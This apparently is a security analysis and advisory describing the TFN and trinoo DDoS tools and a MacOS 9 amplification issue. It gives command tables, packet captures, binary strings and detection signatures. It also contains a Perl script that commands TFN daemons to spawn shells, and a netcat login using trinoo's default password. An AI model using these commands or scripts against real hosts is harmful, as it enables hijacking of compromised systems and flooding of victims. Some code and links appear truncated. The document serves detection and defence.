               +----------+           +----------+            +----------+
               |  client  |           |  client  |            |  client  |
               +----------+           +----------+            +----------+
                    |                      |                       |
                    |                      |                       |
    . . . ---+------+-----+------------+---+--------+------------+-+-- . . .
             |            |            |            |            |
             |            |            |            |            |
         +--------+   +--------+   +--------+   +--------+   +--------+
         | daemon |   | daemon |   | daemon |   | daemon |   | daemon |
         +--------+   +--------+   +--------+   +--------+   +--------+

    The attacker(s)  control one  or more  clients, each  of which can
    control  many  daemons.   The   daemons  are  all  instructed   to
    coordinate  a  packet  based  attack  against  one  or more victim
    systems by the client.

    Remote control of a TFN  network is accomplished via command  line
    execution of the client  program, which can be  accomplished using
    any of a  number of connection  methods (e.g., remote  shell bound
    to a TCP port, UDP  based client/server remote shells, ICMP  based
    client/server  shells  such  as  LOKI,  SSH  terminal sessions, or
    normal "telnet" TCP terminal  sessions).  No password  is required
    to run the client,  although it is necessary  to have the list  of
    daemons at hand in an  "iplist" file.  Communication from  the TFN
    client  to  daemons  is  accomplished  via ICMP_ECHOREPLY packets.
    There is no TCP or UDP based communication between the client  and
    daemons at all.   (Some network monitoring  tools do not  show the
    data portion of ICMP packets, or  do not parse all of the  various
    ICMP  type-specific  fields,  so  it  may be difficult to actually
    monitor the  communication between  client and  daemon).   Running
    the program without specifying  any options or arguments  gets you
    a help screen, which shows the commands supported by TFN:

		        [tribe flood network]	 (c) 1999 by Mixter

        usage: ./tfn <iplist> <type> [ip] [port]
        <iplist>     contains a list of numerical hosts that are ready to flood
        <type>       -1 for spoofmask type (specify 0-3), -2 for packet size,
                     is 0 for stop/status, 1 for udp, 2 for syn, 3 for icmp,
                     4 to bind a rootshell (specify port)
                     5 to smurf, first ip is target, further ips are broadcasts
        [ip]         target ip[s], separated by @ if more than one
        [port]       must be given for a syn flood, 0 = RANDOM

    While the client is not password protected, per se, each "command"
    to the daemons is  sent in the form  of a 16 bit  binary number in
    the id field  of an ICMP_ECHOREPLY  packet.  (The  sequence number
    is a constant 0x0000, which  would make it look like  the response
    to the initial packet sent out by the "ping" command.)  The values
    of these numbers, as  well as macros that  change the name of  the
    running  process  as  seen  by  PS(1),  are  defined  by  the file

        #ifndef _CONFIG_H

        /* user defined values for the teletubby flood network */

        #define HIDEME "tfn-daemon"
        #define HIDEKIDS "tfn-child"
        #define CHLD_MAX 50

        /* #define ATTACKLOG "attack.log" keep a log of attacks/victims on all
           hosts running td for debugging etc. (hint: bad idea) */

        /* These are like passwords, you might want to change them */

        #define ID_ACK		123	/* for replies to the client */
        #define ID_SHELL	456	/* to bind a rootshell, optional */
        #define ID_PSIZE	789	/* to change size of udp/icmp packets */
        #define ID_SWITCH	234	/* to switch spoofing mode */
        #define ID_STOPIT	567	/* to stop flooding */
        #define ID_SENDUDP	890	/* to udp flood */
        #define ID_SENDSYN	345	/* to syn flood */
        #define ID_SYNPORT	678	/* to set port */
        #define ID_ICMP		901	/* to icmp flood */
        #define ID_SMURF	666	/* haps! haps! */

        #define _CONFIG_H

    As you can see, it is recommended that these be changed to prevent
    someone stumbling across the daemons from knowing what values  are
    used, thereby allowing them to execute daemon commands.

    As with trinoo, the method used to install the client/daemon  will
    be the same as installing any  program on a Unix system, with  all
    the standard options for concealing the programs and files.   Both
    the client and the daemon must  be run as root, as they  both open
    a AF_INET socket  in SOCK_RAW mode.   The client program  requires
    the iplist  be available,  so finding  a client  will allow you to
    get the  list of  clients.   Recent installations  of TFN  daemons
    have included strings that indicate  the author is (or has)  added
    Blowfish encryption of the iplist  file.  This will make  the task
    of determining  the daemons  much harder.   Strings embedded  in a
    recently recovered  TFN daemon  binary (edited  and rearranged for
    clarity, with comments to the right) are:

        blowfish_decipher		Uses Blowfish for encryption of something.

        addnewmserver			Has more advanced client/server functions.

        commence_icmp			Attack function signatures.

        setsockopt			Remote shell function.

        tc: unknown host
        rm -rf %s
        rcp %s@%s:sol.bin %s		Embedded commands to upload files,
        nohup ./%s			delete files, and with an association			with a particular IP address			(possibly a client, or location of a
        lpsched				file cache)

    If "lsof" is used to  examine the running daemon process,  it only
    shows an open socket of unspecified protocol:

        td        5931     root  cwd    DIR        3,5    1024    240721 /usr/lib/libx/...
        td        5931     root  rtd    DIR        3,1    1024         2 /
        td        5931     root  txt    REG        3,5  297508    240734 /usr/lib/libx/.../td
        td        5931     root    3u  sock        0,0             92814 can't identify protocol

    If a remote shell has been started, the daemon will fork and  show
    a new process with a listening TCP port:

        td        5970     root  cwd    DIR        3,5    1024    240721 /usr/lib/libx/...
        td        5970     root  rtd    DIR        3,1    1024         2 /
        td        5970     root  txt    REG        3,5  297508    240734 /usr/lib/libx/.../td (deleted)
        td        5970     root    0u  inet      92909               TCP *:12345 (LISTEN)
        td        5970     root    3u  sock        0,0             92814 can't identify protocol

    Monitoring the network traffic using "sniffit" and doing "ping  -c
    3"   (sends   three   ICMP_ECHO   packets,   wait   for
    ICMP_ECHOREPLY packets in  return, and quit)  looks like this  (IP
    header removed for clarity):

        # sniffit -d -a -x -b -s @ -Picmp
        Supported Network device found. (eth0)
        Sniffit.0.3.7 Beta is up and running.... (

        ICMP message id: >
          ICMP type: Echo request
         .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. .
         .. . .. . .. . .. . 08 . 00 . 2B + 51 Q 98 . 04 . 00 . 00 . 37 7 FC . 0D . 38 8
         02 . 73 s 02 . 00 . 08 . 09 . 0A . 0B . 0C . 0D . 0E . 0F . 10 . 11 . 12 . 13 .
         14 . 15 . 16 . 17 . 18 . 19 . 1A . 1B . 1C . 1D . 1E . 1F . 20   21 ! 22 " 23 #
         24 $ 25 % 26 & 27 ' 28 ( 29 ) 2A * 2B + 2C , 2D - 2E . 2F / 30 0 31 1 32 2 33 3
         34 4 35 5 36 6 37 7

        ICMP message id: >
          ICMP type: Echo reply
         .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. .
         .. . .. . .. . .. . 00 . 00 . 33 3 51 Q 98 . 04 . 00 . 00 . 37 7 FC . 0D . 38 8
         02 . 73 s 02 . 00 . 08 . 09 . 0A . 0B . 0C . 0D . 0E . 0F . 10 . 11 . 12 . 13 .
         14 . 15 . 16 . 17 . 18 . 19 . 1A . 1B . 1C . 1D . 1E . 1F . 20   21 ! 22 " 23 #
         24 $ 25 % 26 & 27 ' 28 ( 29 ) 2A * 2B + 2C , 2D - 2E . 2F / 30 0 31 1 32 2 33 3
         34 4 35 5 36 6 37 7

        ICMP message id: >
          ICMP type: Echo request
         .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. .
         .. . .. . .. . .. . 08 . 00 . 58 X 61 a 98 . 04 . 01 . 00 . 38 8 FC . 0D . 38 8
         D3 . 62 b 02 . 00 . 08 . 09 . 0A . 0B . 0C . 0D . 0E . 0F . 10 . 11 . 12 . 13 .
         14 . 15 . 16 . 17 . 18 . 19 . 1A . 1B . 1C . 1D . 1E . 1F . 20   21 ! 22 " 23 #
         24 $ 25 % 26 & 27 ' 28 ( 29 ) 2A * 2B + 2C , 2D - 2E . 2F / 30 0 31 1 32 2 33 3
         34 4 35 5 36 6 37 7

        ICMP message id: >
          ICMP type: Echo reply
         .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. .
         .. . .. . .. . .. . 00 . 00 . 60 ` 61 a 98 . 04 . 01 . 00 . 38 8 FC . 0D . 38 8
         D3 . 62 b 02 . 00 . 08 . 09 . 0A . 0B . 0C . 0D . 0E . 0F . 10 . 11 . 12 . 13 .
         14 . 15 . 16 . 17 . 18 . 19 . 1A . 1B . 1C . 1D . 1E . 1F . 20   21 ! 22 " 23 #
         24 $ 25 % 26 & 27 ' 28 ( 29 ) 2A * 2B + 2C , 2D - 2E . 2F / 30 0 31 1 32 2 33 3
         34 4 35 5 36 6 37 7

        ICMP message id: >
          ICMP type: Echo request
         .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. .
         .. . .. . .. . .. . 08 . 00 . 70 p 61 a 98 . 04 . 02 . 00 . 39 9 FC . 0D . 38 8
         B9 . 62 b 02 . 00 . 08 . 09 . 0A . 0B . 0C . 0D . 0E . 0F . 10 . 11 . 12 . 13 .
         14 . 15 . 16 . 17 . 18 . 19 . 1A . 1B . 1C . 1D . 1E . 1F . 20   21 ! 22 " 23 #
         24 $ 25 % 26 & 27 ' 28 ( 29 ) 2A * 2B + 2C , 2D - 2E . 2F / 30 0 31 1 32 2 33 3
         34 4 35 5 36 6 37 7

        ICMP message id: >
          ICMP type: Echo reply
         .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. .
         .. . .. . .. . .. . 00 . 00 . 78 x 61 a 98 . 04 . 02 . 00 . 39 9 FC . 0D . 38 8
         B9 . 62 b 02 . 00 . 08 . 09 . 0A . 0B . 0C . 0D . 0E . 0F . 10 . 11 . 12 . 13 .
         14 . 15 . 16 . 17 . 18 . 19 . 1A . 1B . 1C . 1D . 1E . 1F . 20   21 ! 22 " 23 #
         24 $ 25 % 26 & 27 ' 28 ( 29 ) 2A * 2B + 2C , 2D - 2E . 2F / 30 0 31 1 32 2 33 3
         34 4 35 5 36 6 37 7

    As you can  see, packets with  a fixed payload  (bytes 17 on)  are
    sent as ICMP_ECHO  packets to the  destination, which returns  the
    same payload as an ICMP_ECHOREPLY packet.  The initial packet  has
    a sequence  number of  zero (seen  as bytes  7 and  8 in  the ICMP
    packet),  which  is  incremented  for  each further packet sent in
    sequence.  Seen by  tcpdump/tcpshow, the three packet  "ping" flow
    would look like:

        # tcpdump -lenx -s 1518 icmp | tcpshow -noip -nolink -cooked
        tcpdump: listening on eth0
        Packet 1
        ICMP Header
	        Type:				echo-request
	        Checksum:			0x9B2A
	        Id:				0x6E03
	        Sequence:			0x0000
        ICMP Data
	        ..................... !"#$%&'()*+,-./01234567
        Packet 2
        ICMP Header
	        Type:				echo-reply
	        Checksum:			0xA32A
	        Id:				0x6E03
	        Sequence:			0x0000
        ICMP Data
	        ..................... !"#$%&'()*+,-./01234567
        Packet 3
        ICMP Header
	        Type:				echo-request
	        Checksum:			0x623A
	        Id:				0x6E03
	        Sequence:			0x0001
        ICMP Data
	        ..................... !"#$%&'()*+,-./01234567
        Packet 4
        ICMP Header
	        Type:				echo-reply
	        Checksum:			0x6A3A
	        Id:				0x6E03
	        Sequence:			0x0001
        ICMP Data
	        ..................... !"#$%&'()*+,-./01234567
        Packet 5
        ICMP Header
	        Type:				echo-request
	        Checksum:			0x5A3A
	        Id:				0x6E03
	        Sequence:			0x0002
        ICMP Data
	        ..................... !"#$%&'()*+,-./01234567
        Packet 6
        ICMP Header
	        Type:				echo-reply
	        Checksum:			0x623A
	        Id:				0x6E03
	        Sequence:			0x0002
        ICMP Data
	        ..................... !"#$%&'()*+,-./01234567

    The TFN client, on the other hand, sends commands to daemons using
    ICMP_ECHOREPLY packets instead of  ICMP_ECHO.  This is  to prevent
    the  kernel   on  the   daemon  system   from  replying   with  an
    ICMP_ECHOREPLY packet.  The daemon  then responds (if need be)  to
    the client(s), also using  an ICMP_ECHOREPLY packet.   The payload
    differs with TFN, as it is used for sending command arguments  and
    replies.  The ICMP_ECHOREPLY  id field contains the  "command" (16
    bit value,  converted to  network byte  order with  htons() in the
    code)  and  any  arguments  in  ASCII  clear text form in the data
    field  of  the  packet.   Here  is  what  an  attacker  sees  when
    executing the command to start a shell listening on port 12345:

        # ./tfn iplist 4 12345
		        [tribe flood network]	 (c) 1999 by Mixter

        [request: bind shell to port 12345] shell bound to port 12345

    Here is the packet  flow for this command  as seen on the  network
    with "sniffit" (IP headers removed for clarity):

        ICMP message id: >
          ICMP type: Echo reply
         .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. .
         .. . .. . .. . .. . 00 . 00 . 64 d D1 . 01 . C8 . 00 . 00 . 31 1 32 2 33 3 34 4
         35 5 00 .

        ICMP message id: >
          ICMP type: Echo reply
         .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. .
         .. . .. . .. . .. . 00 . 00 . 6C l AE . 00 . 7B { 00 . 00 . 73 s 68 h 65 e 6C l
         6C l 20   62 b 6F o 75 u 6E n 64 d 20   74 t 6F o 20   70 p 6F o 72 r 74 t 20
         31 1 32 2 33 3 34 4 35 5 0A . 00 .

    Viewed with  tcpdump alone,  it would  look like  this (IP headers
    removed for clarity):

        # tcpdump -lnx -s 1518 icmp
        tcpdump: listening on eth0
        05:51:32.706829 > icmp: echo reply
			         .... .... .... .... .... .... .... ....
			         .... .... 0000 64d1 01c8 0000 3132 3334
        05:51:32.741556 > icmp: echo reply
			         .... .... .... .... .... .... .... ....
			         .... .... 0000 6cae 007b 0000 7368 656c
			         6c20 626f 756e 6420 746f 2070 6f72 7420
			         3132 3334 350a 00

    Combining  tcpdump  with  tcpshow,  it  is  easier to see the data

        Packet 1
        ICMP Header
	        Type:				echo-reply
	        Checksum:			0x64D1
	        Id:				0x01C8
	        Sequence:			0x0000
        ICMP Data
        Packet 2
        ICMP Header
	        Type:				echo-reply
	        Checksum:			0x6CAE
	        Id:				0x007B
	        Sequence:			0x0000
        ICMP Data
	        shell bound to port 12345

    As can be seen here, the client sends the command 0x01C8  (decimal
    456) in the id field, followed by a sequence number of 0x0000  (it
    is  always  zero  in  the  code),  followed by the NULL terminated
    ASCII  string  "12345"  (specified  port  number)  is  sent to the
    daemon.   The  daemon  responds  with  the  command  reply  0x007B
    (decimal 123) in  the id field,  followed by a  sequence number of
    0x0000, followed by the NULL terminated ASCII string "shell  bound
    to port 12345\n".  This string is then echoed to the shell by  the
    client, with the daemon's IP address prepended.

    If the source has not been modified, you can identify TFN  clients
    and  daemons  by  observing  the  strings  embedded in the program

        # strings - td
         . . .
        already %s flooding
        multiple targets
        ICMP flood: %s
        SMURF (target@bcast@...): %s
        UDP flood: %s
        SYN flood: port %d, multiple targets
        SYN flood: port %d, %s
        ready - size: %d spoof: %d
        %s flood terminated
        packet size: %d bytes
        spoof mask: *.*.*.* (%s)
        spoof mask: 1.*.*.* (%s)
        spoof mask: 1.1.*.* (%s)
        spoof mask: 1.1.1.* (%s)
        spoof test: %s
        shell bound to port %s
         . . .
        [0;35m[tribe flood network]
         (c) 1999 by
         . . .

        # strings - tfn
         . . .
        ERROR reading IP list
        [request: change packet size]
        [request: change spoofmask]
        [request: stop and display status]
        [request: udp flood %s]
        [request: syn flood [port: %s] %s]
        [request: icmp flood %s]
        [request: bind shell to port %s]
        [request: smurf (target@bcast@...) %s]
        usage: %s <iplist> <type> [ip] [port]
        <iplist>     contains a list of numerical hosts that are ready to flood
        <type>       -1 for spoofmask type (specify 0-3), -2 for packet size,
                     is 0 for stop/status, 1 for udp, 2 for syn, 3 for icmp,
                     4 to bind a rootshell (specify port)
                     5 to smurf, first ip is target, further ips are broadcasts
        [ip]         target ip[s], separated by %s if more than one
        [port]       must be given for a syn flood, 0 = RANDOM
        [0;35m[tribe flood network]
         (c) 1999 by
         . . .

    More recent binaries (shown earlier) include strings that indicate
    the newer  code now  has multi-master  (instead of  single client)
    capabilities,  like  trinoo,  and  encryption  of (presumably) the
    iplist file, list of masters, and possibly even encryption of  the
    data portion of  the ICMP packets.   The newer binaries  recovered
    also show  use of  the Berkeley  "rcp" command.   Monitoring "rcp"
    connections (514/tcp)  from multiple  systems on  your network, in
    quick  succession,  to  a  single  IP address outside your network
    would be a  good trigger. (Note  that the use  of "rcp" in  a this
    form  requires  an  anonymous  trust  relationship, usually in the
    form of "+ +"  in a user's ~/.rhosts  file, which also will  allow
    you  to  immediately  archive  the  contents of this account while
    contacting the owners to preserve evidence).  Since TFN uses  ICMP
    packets,  it  is  much  more  difficult  to  detect in action, and
    packets  will  go  right  through  most  firewalls.  Programs like
    "ngrep" do  not process  ICMP packets,  so you  will not as easily
    (at this point in time) be  able to watch for strings in  the data
    portion of the ICMP packets.

    One  weakness  in  TFN  is  that  it does no authentication of the
    source of ICMP  packets (at least  not in the  code used for  this
    analysis).   If the  command value  has not  been changed from the
    default, only one packet would be necessary to flush out a daemon.
    (A  Perl  script  using  Net::RawIP  named  "civilize"  has   been
    developed to  accomplish this  task).   If the  command values had
    been changed,  you could  still brute  force attack  the daemon by
    sending all combinations  of three digit  values (the id  field is
    16 bits, so the actual maximum  should be 64K).  While this  would
    almost constitute  an ICMP  flood attack  in its  own right, it is
    still a potential weakness that can be exploited.

    Perl script "civilize" to control TFN daemons:

    # civilize v. 1.0
    # By Dave Dittrich <>
    # Send commands to TFN daemon(s), causing them to do things like
    # spawn shells, stop floods and report status, etc.  Using this program
    # (and knowledge of the proper daemon "passwords"), you can affect TFN
    # daemons externally and monitor packets to verify if a daemon is
    # running, etc.  You can also brute force attack the "passwords" by
    # sending packets until you get the desired reply (or give up.)
    # Needs Net::RawIP (
    # Requires libpcap (
    # Example: ./civilize [options] host1 [host2 [...]]
    # (This code was hacked from the "macof" program, written by
    # Ian Vitek <>)

    require '';
    use Net::RawIP;
    require 'netinet/';

    $a = new Net::RawIP({icmp => {}});
    chop($hostname = `hostname`);

    die "usage: $0 [options] iplist\
    \t-a arg\t\tSend command argument 'arg' (default \"12345\")\
    \t-c val\t\tSend command value 'val' (default 456 - spawn a shell)\
    \t-f from_host\t\t(default:$hostname)\
    \t-i interface \t\tSet sending interface (default:eth0)\
    \t-h This help\n" unless ( !$opt_h );

    # set default values
    $opt_i = ($opt_i) ? $opt_i : "eth0";
    $opt_a = ($opt_a) ? $opt_a : "12345";
    $opt_c = ($opt_c) ? $opt_c : "456";

    # choose network card
    if($opt_e) {
      $a->ethnew($opt_i, dest => $opt_e);
    } else {

    $s_host = ($opt_h) ? $opt_h : $hostname;

    if ($ARGV[0]) {
      open(I,"<$ARGV[0]") || die "could not open file: '$ARGV[0]'";
      while (<I>) {

    # Put value in network byte order (couldn't get htons() in
    # "netinet/" to work. Go figure.)
    $id = unpack("S", pack("n", $opt_c));

    foreach $d_host (@list) {
      $a->set({ip => {saddr => $s_host, daddr => $d_host},
               icmp => {type => 0, id => $id, data => "$opt_a\0"}
      print "sending packet [$opt_c/$opt_a] to $d_host\n" if $opt_v;


    TFN 1.3.0053 can be obtained from

    MacOS 9 can be abused by an intruder to generate a large volume of
    traffic directed  at a  victim in  response to  a small  amount of
    traffic produced by an intruder.   This allows an intruder to  use
    MacOS 9 as a "traffic amplifier," and flood victims with  traffic.
    According  to  The  "Mac  Attack,"  a Scheme for Blocking Internet
    Connections, John A. Copeland, December, 1999, available at

    an  intruder  can  use  this  asymmetry  to "amplify" traffic by a
    factor  of  approximately  37.5,  thus  enabling  an intruder with
    limited bandwidth  to flood  a much  larger connection.   Unlike a
    smurf  attack,  however,  it  is  not  necessary to use a directed
    broadcast to achieve traffic amplification.


    Of course,  the best  defense is  to prevent  intrusions and  root
    level compromise  of your  systems in  the first  place, so  there
    would be  no systems  on which  to install  trinoo master/daemons.
    In the  real world,  this is  not an  option (at  least not in the
    foreseeable  future.)   Instead,  your  network  may  already have
    several trinoo daemons running and  ready to DoS other systems  at
    any minute.  So how can they be detected or disabled?

    Because  the  programs  use  high  numbered  UDP  ports  for  both
    communication  and  attack,  it  will  be  very  difficult (if not
    impossible) to block it without breaking programs that use UDP  on
    high numbered ports.   The easiest method  to detect the  presence
    of trinoo masters  or daemons (as  the code exists  presently) may
    be to  monitor all  UDP packets  on shared  Ethernet segments  and
    look for the  tell tale signs  of communication between  master(s)
    and  daemon(s)  as  described  elsewhere  in this paper. (Switches
    would preclude  seeing UDP  packets that  are not  associated with
    the  MAC  address  of  the  monitoring  host's network interface.)
    Unfortunately,  this  would  only  occur  during  an attack, which
    would  likely  become  known  by  network  throughput  degradation
    and/or reports of denial of service attacks from victim sites.  If
    a system is suspected of hosting a trinoo daemon that is  actively
    attacking,  the  output  of  the  Solaris  "truss"  program on the
    running daemon will show output like the following:

         . . .
        getmsg(3, 0xEFFFF830, 0xEFFFF83C, 0xEFFFF81C)	= 0
        getmsg(3, 0xEFFFF830, 0xEFFFF83C, 0xEFFFF81C) (sleeping...)
        getmsg(3, 0xEFFFF830, 0xEFFFF83C, 0xEFFFF81C)	= 0
        time()						= 938385467
        open("/dev/udp", O_RDWR)			= 5
        ioctl(5, I_PUSH, "sockmod")			= 0
        ioctl(5, I_STR, 0xEFFFF748)			= 0
        ioctl(5, I_SETCLTIME, 0xEFFFF7FC)		= 0
        ioctl(5, I_SWROPT, 0x00000002)			= 0
        sigprocmask(SIG_SETMASK, 0xEFFFF7EC, 0xEFFFF7DC) = 0
        ioctl(5, I_STR, 0xEFFFF660)			= 0
        sigprocmask(SIG_SETMASK, 0xEFFFF7DC, 0xEFFFF7B8) = 0
        sigprocmask(SIG_BLOCK, 0xEFFFF548, 0xEFFFF5C0)	= 0
        ioctl(5, I_STR, 0xEFFFF548)			= 0
        sigprocmask(SIG_SETMASK, 0xEFFFF5C0, 0x00000000) = 0
        putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0)		= 0
        time()						= 938385467
        putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0)		= 0
        time()						= 938385467
        putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0)		= 0
        time()						= 938385467
        putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0)		= 0
        time()						= 938385467
        putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0)		= 0
        time()						= 938385467
        putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0)		= 0
        time()						= 938385467
        putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0)		= 0
        time()						= 938385467
        putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0)		= 0
        time()						= 938385467
        putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0)		= 0
        time()						= 938385467
        putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0)		= 0
        time()						= 938385467
         . . .

    The  traffic  on  the  network  during  an attack against a single
    target (as seen by "tcpdump") would look like:

        # tcpdump ip host
         . . .
        15:40:08.491782 > udp 25
        15:40:08.574453 > 216.160.XX.YY.16838: udp 4 (DF)
        15:40:08.576427 > 216.160.XX.YY.5758: udp 4 (DF)
        15:40:08.579752 > 216.160.XX.YY.10113: udp 4 (DF)
        15:40:08.583056 > 216.160.XX.YY.17515: udp 4 (DF)
        15:40:08.600948 > 216.160.XX.YY.31051: udp 4 (DF)
        15:40:08.604943 > 216.160.XX.YY.5627: udp 4 (DF)
        15:40:08.610886 > 216.160.XX.YY.23010: udp 4 (DF)
        15:40:08.614202 > 216.160.XX.YY.7419: udp 4 (DF)
        15:40:08.615507 > 216.160.XX.YY.16212: udp 4 (DF)
        15:40:08.616854 > 216.160.XX.YY.4086: udp 4 (DF)
        15:40:08.618827 > 216.160.XX.YY.2749: udp 4 (DF)
        15:40:08.623480 > 216.160.XX.YY.12767: udp 4 (DF)
        15:40:08.625458 > 216.160.XX.YY.9084: udp 4 (DF)
        15:40:08.628764 > 216.160.XX.YY.12060: udp 4 (DF)
        15:40:08.632090 > 216.160.XX.YY.32225: udp 4 (DF)
         . . .

    Currently  Trinoo  has  several  signatures  that  allow  it to be
    detected from IP flow records.  Trinoo Daemon (ns.c):

        1. The trinoo daemon by default listens to UDP port 27444
        2. All  communication  with  the  trinoo daemon must have  the
           string l44 (ell 44).
        3. The SYN flood mechanism picks the destination port via  the
           following algorithm:
             to.syn_port = htons(rand() % 65534)

    Several observations can be made:

    a. randomize()/srandom() is never called, so the destination port
        will always fit the following algorithm:
        SYN packet 1 has destination port x
        SYN packet 2 has destination port y as defined by
         srandom(x); y = rand();
        SYN packet 3 has destination port z as defined by
         srandom(y); z = rand();
    b. Since the port is a result of modulus 65534, destination port 0
       will show up, while destination port 65535 will not.

    IDS detection of daemon:

    1. Look  for UDP  connections to  destination port  27444. This is
       indicative of the control session.
    2. The string l44 will determine with a large probability that the
       packet is part of a trinoo control session.
    3. Running trinoo  DoS attacks (SYN  Floods) can be  identified by
       the algorithm given in 3 above.  In addition, if you can  catch
       the first  SYN, it  will *always*  be the  result of  srand(1);
       rand();.   On  one  authors  laptop,  an  example  sequence  of
       destination ports would be:

    Although this doesn't stop the Denial of Service, it will say with
    some probability  this is  a trinoo  attack, and  you should start
    looking for a master!

    Detecting the trinoo daemon on your network:

        Trinoo daemons  can be  indexed by  a master  by sending a png
        command.  Live daemons will respond with a PONG. The  original
        author  probably  added  this  so  the  master  can  see which
        daemons are  still alive.   You can  scan a  network with  the
        attached  program  for  anything  that  responds appropriately
        (which chances are is a trinoo daemon).

    Trinoo Server  (master.c).   The network  communications that  are
    indicative of a trinoo server are:

        1. Sending UDP packets with destination port 27444
        2. UDP  packets  as  described  above with the string  l44adsl
           (ell 44 a d sell)
        3. A server will bind to port 27665

    IDS detecting the trinoo server:

        1. Look for flows with protocol type 17 (UDP)
        2. TCP connections (protocol type 6) to destination port 27665
           (the trinoo server)

    Detecting the Trinoo server of your network:

        The server password hasn't changed (to the best of the authors
        knowledge), nor has the port  it listens to.  Trinoo  possible
        masters can  be detected  by using  a tool  like nmap  to find
        hosts listening to port 27665, i.e.

          nmap -PI -sT -p 27655 -m logfile "you.subnet.*.*"

        After a list of possible servers has been compiled, automated
        login can be used for positive identification.  If you wish
        to script the automated login, try netcat (nc on most
        systems), i.e.

          echo "betaalmostdone" | nc <IP> 27665

    Because  the   TFN  programs   use  ICMP_ECHOREPLY   packets   for
    communication, it will  be very difficult  (if not impossible)  to
    block  it  without  breaking  most  Internet programs that rely on
    ICMP.  The Phrack paper on LOKI states:

        The only sure way to destroy this channel is to deny ALL
        ICMP_ECHO traffic into your network.

    Short of rejecting this traffic,  it will instead be necessary  to
    observe  the  difference  between  "normal"  use  of ICMP_ECHO and
    ICMP_ECHOREPLY packets by programs like "ping".  This will not  be
    an easy task, especially on large networks.

    Apple is developing a patch.   They reproduced the problem in  our
    lab and  we are  working now  to create  a fix  that can be easily
    distributed to our customers.  The problem only affects  customers
    running our most recent release of networking software on machines
    that  are  continuously  attached  to  the  internet.   While most
    Macintosh customers  are not  affected by  this problem,  Apple is
    moving quickly to put a solution in place.